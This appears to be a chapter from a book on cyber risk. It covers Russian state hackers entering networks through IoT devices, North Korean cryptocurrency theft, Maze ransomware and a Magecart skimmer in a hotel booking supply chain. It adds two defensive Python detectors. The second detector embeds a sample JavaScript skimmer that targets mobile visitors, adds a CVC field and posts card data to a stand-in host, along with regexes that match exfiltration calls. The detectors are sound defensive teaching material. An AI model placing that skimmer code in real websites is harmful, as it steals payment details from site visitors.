The IoT’s growing importance

The Russian model of cyber as an economic and political weapon involves cyberattack in various forms, denial of responsibility, placing the blame on others, especially proxies, and using cyberwarfare to produce economic, political, social and physical infrastructural damage. Their whole modus operandi relies on stealth, deceit, denial and blaming others. This means they choose cyber mechanisms that are not easy to detect and that are indirect in nature.

Therefore, as mentioned in Chapter 1, the IoT is being used more and more as an entry point. A prime example came to light in April 2019, when Microsoft’s Threat Intelligence Center identified an IoT cyberattack carried out through three devices: a Voice over Internet Protocol (VoIP) phone, an office printer and a video decoder. The IoT devices provided soft access to a number of locations in the wider corporate network. Two of the three devices still had their factory default passwords, while the third had not yet had the latest security update applied.

Microsoft noted that the cyberattack bore the hallmarks of the Russian hackers linked to the GRU, tracked under a variety of names such as Fancy Bear, APT28 and Strontium. This group of Russian state hackers has been active since 2007, as outlined above, but from April 2019 Microsoft noticed that the focus of its attacks had shifted to the IoT. It is usually thought that hackers target smartphones and computers for easy access to data or to implant malware, but it is more often cameras, printers and decoders that offer the soft access. The point of entry to these devices is a default password or a password that has never been changed. With the device left unpatched and its credentials unchanged, the hackers create a beachhead that is their starting point for entering the unprotected corporate network. Once the hackers have established firm access to the network, a simple scan for additional insecure devices allows them to move on to higher-value accounts offering data and other privileged information. From there, the hackers move from one device to another, all the while mapping the network and communicating with their command-and-control servers.

Microsoft has been observing an increase in global activity from the Russian state hackers. Since the initial cyberattack Microsoft has sent notifications to 1,400 recipients who have been targeted or compromised by APT28, or Fancy Bear. Of those targeted, 20% have been think-tanks such as European Values, mentioned above, politically affiliated organisations and NGOs. The remaining 80% of the cyberattacks covered, among others, education, technology, engineering, medicine, the military, Olympic organisers, anti-doping agencies and the hospitality industry. In 2018, the FBI took action to disrupt a Fancy Bear campaign named VPNFilter, which targeted routers and network storage devices with malware that had the destructive capacity to ‘brick’ devices by overwriting their firmware and rendering them useless. This campaign targeted Ukraine in particular, which is often the target of Russian state hackers.12

As IoT devices rapidly increase in number and less sophisticated, low-technology devices become the entry point for skilled hackers, in this case Russian state actors, the severity of cyberattack/cyberwarfare continues to grow. The extent of this cyber risk in relation to the IoT was demonstrated when security researchers at Armis found eleven zero-day vulnerabilities, dubbed URGENT/11, in VxWorks, the real-time operating system that runs on a very large share of the world’s IoT and embedded devices. The disclosure meant that low-technology devices connected in the IoT such as firewalls, medical equipment such as telemedicine platforms, and printers could, as described above, provide soft access points to corporate networks, undermining the multiple layers of security behind them.

Microsoft noted that part of the problem is that IoT devices are just interconnected facilitators with little if any management oversight. How many companies hire staff to look after the vulnerabilities of their printers? In fact, Microsoft noted that most of its customers’ IT operations do not know that their simple devices are connected to the internet. Worse, network analysis showed that the IoT devices were communicating with external command-and-control infrastructure, which allows hackers hunting for further access points to gain ingress. Microsoft made this disclosure to alert companies to the cyber risks they face, especially as the number of IoT devices far exceeds personal computers (PCs) and mobile phones combined. The sectors particularly vulnerable to cyberattack that are covered in this book will also be assessed in terms of IoT vulnerability, as in my previous book on managing cyber risk in the financial sector.13
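The two behaviours described in the preceding paragraphs, an embedded device beaconing to an outside host and the same device probing its neighbours for further footholds, are both visible in ordinary flow records if someone looks. The script below is an added example for this chapter, not code from Microsoft or from the book. It assumes a small device inventory that labels printers, VoIP phones and video decoders by IP address (hypothetical) and flow records in a simple CSV form (constructed here); a real deployment would read NetFlow or Zeek conn.log records and take the inventory from an asset database.

```python
"""Flag IoT devices that beacon outbound or fan out across the LAN.

Added example, not code from Microsoft or the book. Inventory and flow
records are constructed; the device classes and thresholds are assumptions.
"""
import ipaddress
from collections import defaultdict

# Constructed inventory: IP -> (hostname, device class).
INVENTORY = {
    "10.0.5.21": ("prn-floor2", "printer"),
    "10.0.5.40": ("voip-lobby", "voip_phone"),
    "10.0.5.77": ("decoder-boardroom", "video_decoder"),
    "10.0.1.15": ("ws-alice", "workstation"),
}
IOT_CLASSES = {"printer", "voip_phone", "video_decoder"}

# The organisation's own address space; anything outside it is "external".
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Ports an embedded device has no business probing on other hosts.
ADMIN_PORTS = {22, 23, 445, 3389, 5900}

# Constructed flow records: src_ip,dst_ip,dst_port,bytes_out
FLOWS = """\
10.0.5.21,10.0.0.5,631,1200
10.0.5.21,10.0.0.5,445,3000
10.0.5.40,203.0.113.9,443,5400
10.0.5.40,203.0.113.9,443,5600
10.0.5.77,10.0.0.5,53,90
10.0.5.77,10.0.5.21,23,80
10.0.5.77,10.0.5.40,22,80
10.0.5.77,10.0.1.15,445,80
10.0.5.77,198.51.100.7,8443,2200
10.0.1.15,203.0.113.50,443,9800
"""


def parse_flows(text):
    """Parse 'src,dst,port,bytes' lines into (src, dst, port, bytes) tuples."""
    records = []
    for line in text.strip().splitlines():
        src, dst, port, nbytes = line.split(",")
        records.append((src, dst, int(port), int(nbytes)))
    return records


def is_internal(ip):
    """True if the address falls inside the organisation's own ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def find_suspicious(records, inventory=INVENTORY, fanout_threshold=3):
    """Return (src_ip, hostname, rule, targets) for IoT devices that either
    talk to addresses outside the organisation (possible command-and-control
    beaconing) or touch admin ports on several internal hosts (scanning or
    lateral movement). Hosts not in an IoT class are ignored by this rule set."""
    external = defaultdict(set)       # src -> external destinations
    admin_targets = defaultdict(set)  # src -> internal hosts probed on admin ports
    for src, dst, port, _ in records:
        entry = inventory.get(src)
        if entry is None or entry[1] not in IOT_CLASSES:
            continue
        if not is_internal(dst):
            external[src].add(dst)
        elif port in ADMIN_PORTS:
            admin_targets[src].add(dst)

    findings = []
    for src in sorted(set(external) | set(admin_targets)):
        name = inventory[src][0]
        if external.get(src):
            findings.append((src, name, "external_c2_candidate", sorted(external[src])))
        if len(admin_targets.get(src, ())) >= fanout_threshold:
            findings.append((src, name, "internal_scan_candidate", sorted(admin_targets[src])))
    return findings


if __name__ == "__main__":
    for src, name, rule, targets in find_suspicious(parse_flows(FLOWS)):
        print(f"{src} ({name}): {rule} -> {', '.join(targets)}")
```

On the constructed data the printer is quiet (it only talks to an internal print server), the VoIP phone is flagged for repeated sessions to an outside address, and the decoder is flagged twice: once for its outbound connection and once for touching telnet, SSH and SMB on three different internal hosts, which is the "scan the network for additional insecure devices" step in the narrative. The workstation's outbound HTTPS is deliberately not flagged, because the rule is about devices that should never initiate such traffic; the point of the inventory is that the rule only works if the organisation knows which of its addresses are printers and phones in the first place.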

There have been warnings for years from cybercrime experts that even the humble office coffee machine can be a target of cybercriminals, because of the ease of entry and because it is cheap for criminals to buy ransomware from dark web sites. In such cases it is even possible to buy one ransomware kit and get one free, sharing the profits with the people who wrote the code. Jamie Bartlett, Director of the Centre for Analysis of Social Media at Demos, noted that the IoT is so poorly designed that it could in future become possible to be forced to pay a small ransom in cryptocurrency to obtain coffee from the office coffee machine.14

Cryptocurrencies – another cyber risk

Cryptocurrencies present another opportunity for cyber hackers, whether state actors or individuals, to flourish. The seemingly innocent alternative currency system provides cover for a whole host of cybercriminals.

A prime example is the North Korean state actors, who use increasingly sophisticated means to procure finance through cyberattack/cyberwarfare. A recent UN report outlined the ways in which North Korean state-backed cyber hackers have stolen at least US$ 2 billion from financial institutions and cryptocurrency exchanges. Such monies, whether taken from institutions regulated by nation-states or from unregulated speculators in the case of cryptocurrencies, are used to build WMD and missiles to threaten their enemies around the world, with the exception of North Korea’s backer, mainland China. The UN report is 33 pages in length with 192 annexes that chronicle at least 35 examples of North Korean state actors stealing monies from financial institutions and cryptocurrency exchanges. This is in addition to stealing IP blueprints from advanced missile-producing countries globally. Cryptocurrencies are preferred targets for cyber theft because, according to the UN report, they are harder to trace, not being subject to regulation and oversight by different countries’ central banking systems. Such illegal transfer of funds from countries outside North Korea is facilitated by 30 overseas North Korean banking outlets.15

The advance of cryptocurrency use is also facing hurdles, as in the case of Mark Zuckerberg, CEO of Facebook, trying to launch a new cryptocurrency entitled Libra. This move has been met with scepticism given the criticisms of how Facebook’s social media platform was used by the Russians to bias the 2016 American presidential election towards Donald Trump.

There have also been moves by countries led by rogue dictators and by small island countries to issue cryptocurrencies, which would boost their economies and also allow dictatorships such as North Korea to launder ill-gotten gains. Venezuela has tried unsuccessfully to launch a sovereign cryptocurrency, the petro. The government of the small Marshall Islands launched a SOV Development Fund in 2018 to create a cryptocurrency named the SOV. The government has passed a bill in the legislature to support the SOV, as it would raise much-needed revenue for the islanders, who have suffered from a US crackdown on money laundering that has raised compliance fees to the point that most banks no longer wish to operate in the Marshall Islands. With the SOV the Marshall Islands can send its own money directly without using the global banking system. The problem arises when recipients try to convert the SOV into dollars or other local currencies. In addition, the International Monetary Fund and the US Treasury have raised concerns that SOV-based revenue building could come at a high cost in terms of the Marshall Islands’ reputation and money-laundering risk. The Marshall Islands government in turn has argued that the SOV will be tamper-proof and allow lower-cost compliance to be instituted.16

Cryptocurrencies are becoming less attractive in mainstream markets because of the risks they pose and their use by cybercriminals, increasingly in relation to ransomware attacks. The UK marine engineering firm London Offshore Consultants (LOC) was hacked by a group called Maze, who claimed to have stolen 300GB of data and leaked some of it online to pressure LOC into paying the ransom to unlock its encrypted computers. In early December 2019 the FBI had warned that Maze ransomware attacks had been identified since November of that year, with the attackers often posing as US government agencies, stealing data and then encrypting it in order to extort victims further. One of the multiple methods Maze used was a malicious fake cryptocurrency site of their own creation, in addition to malspam impersonating government agencies.17

Supply-chain cyberattack entry

Another route for obtaining data, IP theft and the implantation of malware, one that has not been given adequate attention by companies and leads to indirect breaches by both individuals and state actors, is through supply chains. Most companies, large and small, as well as government agencies, rely on some form of supply chain for both products and services. In fact, the larger the company, the more it relies on supply chains. A recent example involves two hotel chains, one with 107 hotels in 14 countries and the other with 73 hotels in 14 countries worldwide. A Magecart skimming campaign compromised the hotels’ mobile websites through a third-party supplier. Trend Micro researchers found that hackers had targeted Roomleader, based in Barcelona, implanting malicious JavaScript. Roomleader offers digital marketing and website development services, assisting hospitality companies with their booking functions through a library module named ‘viewedhotels’, which saves viewed-hotel information in guests’ browser cookies. In line with the usual Magecart attacks, the skimmer was designed to glean guests’ contact details such as e-mail addresses, credit card details and room preferences. In this case the skimmer was constructed to target only visitors using the mobile website and not those who had used their PCs: desktop users were served the normal JavaScript. Joseph Chen, the fraud researcher at Trend Micro, suggested that mobile websites were targeted because they are not protected by the usual PC security software, so they were easier to enter while escaping detection. The hackers replaced the hotel payment forms with their own slightly different version, translated into eight different languages like the original payment forms to help avoid detection. Additionally, many hotel sites do not ask guests for their Card Verification Code (CVC) at booking time, collecting it when the guests arrive instead; the replacement payment forms made sure to request it.18
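The detail that matters for defenders in the Roomleader case is that the vendor's script was modified in place and the modification only showed itself to mobile browsers, so a check run from an analyst's desktop would have seen a clean file. The script below is an added example for this chapter, not Trend Micro's or Roomleader's code. It assumes a pinned copy of the vendor's script taken when it was last reviewed, plus the bodies the vendor's CDN served to a desktop and a mobile User-Agent. All three are constructed inline here (the cookie helper is a stand-in, the exfiltration host uses the reserved name example.invalid); a real monitor would fetch the live script over HTTPS with each User-Agent string.

```python
"""Spot a third-party script that is tampered only for mobile visitors.

Added example, not Trend Micro's or Roomleader's code. The pinned script,
the served copies and the indicator patterns are all constructed assumptions.
"""
import base64
import hashlib
import re

# Constructed stand-in for a "viewed hotels" cookie helper (the pinned, reviewed copy).
KNOWN_GOOD = """\
(function () {
  var viewed = localStorage.getItem("viewedhotels") || "";
  localStorage.setItem("viewedhotels", viewed + "," + location.pathname);
})();
"""

# Constructed tampered copy: same helper, plus a skimmer that only fires on
# mobile browsers, rewrites the payment form to add a CVC field and posts the
# card data to an attacker-controlled host (example.invalid is a reserved name).
TAMPERED = """\
(function () {
  var viewed = localStorage.getItem("viewedhotels") || "";
  localStorage.setItem("viewedhotels", viewed + "," + location.pathname);
  if (!/Android|iPhone|iPad/i.test(navigator.userAgent)) { return; }
  var form = document.querySelector("#payment");
  form.innerHTML = '<input name="cc_number"><input name="cc_exp"><input name="cvc">';
  form.addEventListener("submit", function () {
    fetch("https://example.invalid/collect", {method: "POST",
          body: JSON.stringify(Object.fromEntries(new FormData(form)))});
  });
})();
"""

# What the CDN "served" per User-Agent in this constructed scenario.
SERVED = {"desktop": KNOWN_GOOD, "mobile": TAMPERED}

# Heuristics for skimmer behaviour in a script that should only touch cookies.
INDICATORS = {
    "ua_gating": re.compile(r"navigator\.userAgent"),
    "form_rewrite": re.compile(r"\.innerHTML\s*="),
    "cvc_field": re.compile(r"\bcv[cv]\b", re.IGNORECASE),
    "exfil_request": re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon)\s*\("),
}


def sri_digest(body, algo="sha384"):
    """Subresource Integrity value for a script body, e.g. 'sha384-...'."""
    raw = hashlib.new(algo, body.encode("utf-8")).digest()
    return algo + "-" + base64.b64encode(raw).decode("ascii")


def skimmer_indicators(body):
    """Names of the INDICATORS patterns that match the given script body."""
    return [name for name, pattern in INDICATORS.items() if pattern.search(body)]


def check_served(pinned, served):
    """Compare each served body against the pinned SRI digest. A mismatch is
    reported together with the skimmer indicators found in the divergent copy."""
    results = {}
    for ua, body in served.items():
        if sri_digest(body) == pinned:
            results[ua] = {"status": "ok", "indicators": []}
        else:
            results[ua] = {"status": "mismatch", "indicators": skimmer_indicators(body)}
    return results


if __name__ == "__main__":
    pinned = sri_digest(KNOWN_GOOD)
    print("pinned:", pinned)
    for ua, result in check_served(pinned, SERVED).items():
        print(ua, result["status"], ",".join(result["indicators"]))
```

The same digest is what goes into the page's script tag as `integrity="sha384-..."` with `crossorigin="anonymous"`, which makes the browser refuse a modified file outright. That control only works when the vendor serves a static, versioned file; a module that is edited in place under the same URL breaks it, which is why the fallback is out-of-band monitoring that fetches the script with a mobile User-Agent as well as a desktop one. A Content-Security-Policy `connect-src` that lists only the hosts the booking page legitimately talks to is the complementary control, since it stops a skimmer from posting the card data anywhere else even if it does load.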

A recent survey by Microsoft and the insurance company Marsh, major players respectively in computing and in insuring its use, reported that company leaders have become even more concerned about the rapid increase in cyberattacks. Yet these business leaders and executives are even less confident than they were in their ability to deal with such cyber risks.19


  • 1 ‘Good for Google, bad for America’, Peter Thiel, New York Times (1 August 2019).
  • 2 ‘Cybercrime and espionage go hand in hand as groups target healthcare and video game world’, Erin Ayers, Advisen Cyber News, Digest Edition (8 August 2019).
  • 3 ‘Beijing hackers moonlight for cash’, Boer Deng, The Times (9 August 2019).
  • 4 ‘Chinese hackers “turned” US spy tools on West’, Boer Deng, The Times (8 May 2019).
  • 5 ‘Huawei says without evidence that U.S. pressured its employees’, Raymond Zhong, New York Times (3 September 2019).
  • 6 ‘North Korea “stole $2bn for weapons via cyber-attacks”’, BBC News Online (7 August 2019).
  • 7 ‘Russia suspected by some in giant Bulgarian hack’, Marc Santora and Eric Schmitt, New York Times (14 August 2019).
  • 8 ‘Episode 13: “The Blueprint”’, Producer/Director John Marks, New York Times (6 September 2019).
  • 9 ‘European Values Think-Tank among 30 Russian watchers targeted by the most sophisticated cyber attack ever done on ProtonMail, probably by the GRU’, press release, European Values (14 August 2019). N.B. Technical details of this cyberattack were made public by Bellingcat.
  • 10 ‘Cyber attack on Ministry of Foreign Affairs’, Naveen Goud, Cybersecurity Insiders.
  • 11 ‘Iranian hackers targeted presidential campaign, Microsoft says’, Nicole Perlroth, New York Times (4 October 2019).
  • 12 ‘Microsoft warns Russian hackers can breach secure networks through simple IoT devices’, Zak Doffman, Forbes (5 August 2019); ‘Russian hacks are infiltrating companies through the office printer’, MIT Technology Review Computing (5 September 2019).
  • 13 ‘Microsoft warns Russian hackers can breach secure networks through simple IoT devices’, Zak Doffman, Forbes (5 August 2019); Ruth Taplin (ed.), Managing Cyber Risk in the Financial Sector: Lessons from Japan, Europe and the USA, Abingdon: Routledge, 2016.
  • 14 ‘It’s time to wake up and smell coffee on cybercrime’, Alexandra Frean, The Times (16 November 2017).
  • 15 ‘North Korea skirted U.N. sanctions and earned US$ 2 billion using cyberattacks, a new U.N. Report says’, Pamela Falk, CBS News (6 August 2019).
  • 16 ‘North Korea stole 2 billion hacking financial bodies - UN report’, MIT Technology Review Computing (5 September 2019).
  • 17 ‘London Offshore Consultants suffers ransomware attack’, Sam Chambers, Splash 24/7 (31 January 2020).
  • 18 ‘Hotel websites infected with skimmer via supply chain attack’, Bradley Barth, SC Media (18 September 2019).
  • 19 ‘Businesses more concerned about cyber risks, but less confident in ability to manage it: Marsh’, Erin Ayers, Advisen Cyber News, Digest Edition (19 September 2019).
